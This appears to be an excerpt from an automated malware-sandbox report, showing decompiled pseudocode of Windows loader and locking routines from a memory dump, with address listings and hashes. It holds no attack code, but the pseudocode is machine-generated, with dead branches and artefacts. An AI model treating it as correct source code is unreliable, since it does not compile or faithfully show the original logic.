									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E053F6B90(_t210,  &_v64);
										_t262 =  *0x54b8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E053FE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E054097C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0540006A(0x54b8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x54b8608);
												E0540B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x54b6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x54b6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E053DFFB0(_t198, _t240, 0x54b8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E054000C2(0x54b8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x053f20a0
0x053f20a8
0x053f20ad
0x053f20b3
0x053f20b8
0x053f20c2
0x053f20c7
0x053f20cb
0x053f20d2
0x053f2263
0x053f2266
0x05435836
0x05435836
0x00000000
0x053f226c
0x053f226c
0x053f2270
0x053f2274
0x053f20e2
0x053f20e2
0x053f20e6
0x053f20ee
0x054357dc
0x054357de
0x054357ec
0x054357ec
0x054357f1
0x054357f3
0x054357f8
0x00000000
0x054357f8
0x054357e0
0x054357e4
0x054357ea
0x00000000
0x00000000
0x00000000
0x054357ea
0x053f20f4
0x053f20f4
0x053f20f8
0x053f20f8
0x053f20fc
0x053f2100
0x053f2106
0x053f2201
0x053f2206
0x053f220b
0x053f220e
0x053f22a9
0x053f22ac
0x00000000
0x00000000
0x053f22b2
0x053f22b5
0x05435801
0x05435806
0x00000000
0x00000000
0x05435810
0x05435815
0x05435818
0x00000000
0x00000000
0x0543581e
0x053f22bb
0x053f22bb
0x053f2218
0x053f2218
0x053f221c
0x053f2220
0x053f2222
0x053f22c2
0x053f22c4
0x053f22dc
0x053f22dc
0x053f22e1
0x00000000
0x00000000
0x00000000
0x053f22e7
0x053f22c8
0x053f22cd
0x053f22d3
0x053f22d6
0x05435823
0x05435825
0x05435827
0x00000000
0x00000000
0x0543582d
0x00000000
0x0543582d
0x00000000
0x053f2228
0x053f2228
0x00000000
0x053f2228
0x053f2222
0x053f2214
0x053f2214
0x00000000
0x053f2114
0x053f2114
0x053f2114
0x053f211a
0x053f211c
0x053f2348
0x053f234d
0x05435840
0x05435845
0x05435848
0x0543584e
0x0543584e
0x05435848
0x053f2353
0x053f2355
0x053f2388
0x053f2388
0x053f2368
0x053f236a
0x053f236c
0x053f238f
0x00000000
0x053f236e
0x053f236e
0x053f218e
0x053f218e
0x053f2191
0x053f2195
0x05435a03
0x05435a06
0x05435a0c
0x05435a0f
0x05435a11
0x05435a13
0x05435a13
0x05435a19
0x05435a1f
0x00000000
0x053f219b
0x053f219b
0x053f21a0
0x053f2282
0x053f2284
0x053f2284
0x053f2284
0x053f2284
0x053f21a6
0x053f21a9
0x053f21ac
0x053f21ae
0x053f21b3
0x053f228b
0x053f2290
0x053f2379
0x053f2296
0x053f2298
0x053f2298
0x053f2290
0x053f21b9
0x053f21be
0x053f22a2
0x053f22a2
0x053f21c4
0x053f21c8
0x053f21cc
0x053f21d0
0x053f21d4
0x053f21de
0x053f21e3
0x05435a29
0x05435a2c
0x00000000
0x00000000
0x05435a3b
0x00000000
0x053f21e9
0x053f21e9
0x053f21e9
0x053f21ee
0x053f21f1
0x05435a45
0x05435a4b
0x05435a52
0x05435a58
0x05435a5d
0x05435a5f
0x05435a71
0x05435a61
0x05435a6a
0x05435a6a
0x05435a76
0x05435a79
0x05435a7f
0x05435a83
0x05435a85
0x05435a87
0x05435a87
0x05435a8c
0x05435a91
0x05435a97
0x05435a9f
0x05435aa0
0x05435aa1
0x05435aa6
0x05435aab
0x05435ab1
0x05435ab3
0x05435ab9
0x05435aca
0x05435ad4
0x05435ad4
0x05435ade
0x05435ade
0x05435aab
0x05435a79
0x05435a52
0x053f21f7
0x053f21f9
0x053f21fe
0x053f21fe
0x053f21e3
0x053f2195
0x053f236c
0x053f2122
0x053f2122
0x053f2124
0x053f2231
0x053f2236
0x053f2236
0x053f2238
0x053f2238
0x053f2240
0x053f2242
0x053f2244
0x054359fc
0x053f218c
0x053f218c
0x00000000
0x053f218c
0x053f224a
0x053f224f
0x053f2256
0x053f2304
0x053f2309
0x053f230f
0x053f231e
0x053f231e
0x053f231e
0x053f2320
0x053f2325
0x053f232a
0x053f232c
0x053f233e
0x053f233e
0x00000000
0x053f232c
0x053f2311
0x053f2317
0x053f231a
0x053f231c
0x053f2380
0x053f2380
0x053f2380
0x053f2384
0x00000000
0x00000000
0x053f2386
0x00000000
0x053f231c
0x053f225c
0x053f225c
0x00000000
0x053f225c
0x053f212a
0x053f2134
0x053f2138
0x053f213d
0x05435858
0x05435863
0x05435863
0x05435867
0x0543586a
0x00000000
0x00000000
0x0543586c
0x0543586c
0x05435871
0x05435875
0x05435877
0x05435997
0x0543599c
0x054359a1
0x054359a7
0x054359a7
0x00000000
0x054359a7
0x0543587d
0x00000000
0x0543588b
0x0543588b
0x05435890
0x05435892
0x05435894
0x05435899
0x0543589b
0x054358a0
0x054358a0
0x054358aa
0x054358b2
0x054358b6
0x054358be
0x054358c6
0x054358c9
0x0543590d
0x05435917
0x0543591a
0x0543591c
0x05435920
0x05435928
0x0543592a
0x0543592c
0x0543592e
0x0543592e
0x054358cb
0x054358cd
0x054358d8
0x054358e0
0x054358f4
0x054358fe
0x054358fe
0x0543593a
0x0543593e
0x05435940
0x05435942
0x00000000
0x05435944
0x05435944
0x05435949
0x0543594e
0x0543594e
0x05435953
0x0543595b
0x05435976
0x05435976
0x0543597a
0x0543597f
0x00000000
0x00000000
0x00000000
0x00000000
0x05435981
0x05435981
0x05435981
0x05435983
0x05435988
0x0543598d
0x05435991
0x05435991
0x00000000
0x0543595d
0x0543595d
0x05435963
0x05435965
0x00000000
0x00000000
0x00000000
0x00000000
0x05435967
0x05435967
0x0543596b
0x0543596d
0x00000000
0x00000000
0x0543596f
0x05435971
0x05435971
0x05435974
0x00000000
0x00000000
0x00000000
0x05435974
0x00000000
0x05435967
0x0543595b
0x05435942
0x05435863
0x053f2143
0x053f2143
0x053f2149
0x053f214f
0x053f22f1
0x053f22f6
0x00000000
0x053f2173
0x053f2173
0x053f217d
0x053f2181
0x053f2186
0x054359ae
0x054359b2
0x054359b5
0x054359b7
0x054359ba
0x054359cd
0x054359d1
0x054359d5
0x054359d9
0x054359db
0x00000000
0x00000000
0x054359dd
0x054359dd
0x054359e1
0x054359e4
0x054359e7
0x054359ee
0x054359ee
0x054359f3
0x054359f3
0x00000000
0x053f2186
0x053f214f
0x053f2106
0x053f2266
0x053f20d8
0x053f20da
0x053f20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6f4cc604e74e14e388d3dd033b4f3fe49a5a6e048fa33b620835b5a07edee7b
Instruction ID: f89dbb1d123faa8afdc4cb78b48a3a4caefc22e8b4efa3b5afe22d337cd5800e
Opcode Fuzzy Hash: c6f4cc604e74e14e388d3dd033b4f3fe49a5a6e048fa33b620835b5a07edee7b
Instruction Fuzzy Hash: 84F1EE35608341DFD725CA28C881BAF7BE6BF89324F04855EFA968B390D774D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 053DD5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E053DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x54bd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E053D6600(0x54b52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x54b7b9c; // 0x0
							_t281 = L053E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0540F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x54b7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x54b7b8c; // 0x5102a38
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E053E2280(_t200, 0x54b84d8);
									_t277 =  *0x54b85f4; // 0x5102f28
									_t351 =  *0x54b85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x5102ec0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E053DFFB0(_t287, _t353, 0x54b84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0541CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E053D6600(0x54b52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E053D7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x54bb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0544E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x54b8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x54bb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x54bb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E053E2280(_t250, 0x54b84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L05403898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E053DFFB0(_t293, _t353, 0x54b84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E054037F5(_t353, 0);
																}
																E05400413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E053F9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E053F02D6(_t174);
																}
																L053E77F0( *0x54b7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E053FC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L053DEC7F(_t353);
										L053F19B8(_t287, 0, _t353, 0);
										_t200 = E053CF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x54bb2f8 |  *0x54bb2fc) == 0 || ( *0x54bb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0540B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x54bb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E05476B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E05476AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E053DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L053DEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E05409730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E053DE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L053D8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E05403C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x053dd5f2
0x053dd5f5
0x053dd5f5
0x053dd5fd
0x053dd600
0x053dd60a
0x053dd60d
0x053dd617
0x053dd61d
0x053dd627
0x053dd62e
0x053dd911
0x053dd913
0x00000000
0x053dd919
0x053dd919
0x053dd919
0x053dd634
0x053dd634
0x053dd634
0x053dd634
0x053dd640
0x053dd8bf
0x00000000
0x053dd646
0x053dd646
0x053dd64d
0x053dd652
0x0542b2fc
0x0542b2fc
0x0542b302
0x0542b33b
0x0542b341
0x00000000
0x0542b304
0x0542b304
0x0542b319
0x0542b31e
0x0542b324
0x0542b326
0x0542b332
0x0542b347
0x0542b34c
0x0542b351
0x0542b35a
0x00000000
0x0542b328
0x0542b328
0x00000000
0x0542b328
0x0542b326
0x053dd658
0x053dd658
0x053dd65b
0x053dd665
0x00000000
0x053dd66b
0x053dd66b
0x053dd66b
0x053dd66b
0x053dd66d
0x053dd672
0x053dd67a
0x00000000
0x00000000
0x053dd680
0x053dd686
0x053dd8ce
0x053dd8d4
0x053dd8dd
0x053dd8e0
0x053dd68c
0x053dd691
0x053dd69d
0x053dd6a2
0x053dd6a7
0x053dd6b0
0x053dd6b5
0x053dd6e0
0x053dd6b7
0x053dd6b7
0x053dd6b9
0x053dd6b9
0x053dd6bb
0x053dd6bd
0x053dd6ce
0x053dd6d0
0x053dd6d2
0x0542b363
0x0542b365
0x00000000
0x0542b36b
0x00000000
0x0542b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x053dd6bf
0x053dd6bf
0x053dd6e5
0x053dd6e7
0x053dd6e9
0x053dd6ec
0x053dd6ec
0x053dd6ef
0x053dd6f5
0x053dd6f9
0x053dd6fb
0x053dd6fd
0x053dd701
0x053dd703
0x053dd70a
0x053dd70a
0x053dd701
0x053dd710
0x053dd710
0x053dd6c1
0x053dd6c1
0x053dd6c6
0x0542b36d
0x0542b36f
0x00000000
0x0542b375
0x0542b375
0x0542b375
0x00000000
0x0542b375
0x00000000
0x053dd6cc
0x053dd6d8
0x053dd6d8
0x053dd6d8
0x00000000
0x053dd6c6
0x053dd6bf
0x00000000
0x053dd6da
0x053dd6da
0x053dd716
0x053dd71b
0x053dd720
0x053dd726
0x053dd726
0x053dd72d
0x00000000
0x053dd733
0x053dd739
0x053dd742
0x053dd750
0x053dd758
0x053dd764
0x053dd776
0x053dd77a
0x053dd783
0x053dd928
0x053dd92c
0x053dd93d
0x053dd944
0x053dd94f
0x053dd954
0x053dd956
0x053dd95f
0x053dd961
0x053dd973
0x053dd973
0x053dd956
0x053dd944
0x053dd92c
0x053dd78b
0x0542b394
0x053dd791
0x053dd798
0x0542b3a3
0x0542b3bb
0x0542b3bb
0x053dd7a5
0x053dd866
0x053dd870
0x053dd892
0x053dd898
0x053dd89e
0x053dd8a0
0x053dd8a6
0x053dd8ac
0x053dd8ae
0x053dd8b4
0x053dd8b4
0x053dd8ae
0x053dd7a5
0x053dd78b
0x053dd7b1
0x0542b3c5
0x0542b3c5
0x053dd7c3
0x053dd7ca
0x053dd7e5
0x053dd7eb
0x053dd8eb
0x053dd8ed
0x00000000
0x053dd8f3
0x053dd8f3
0x053dd8f3
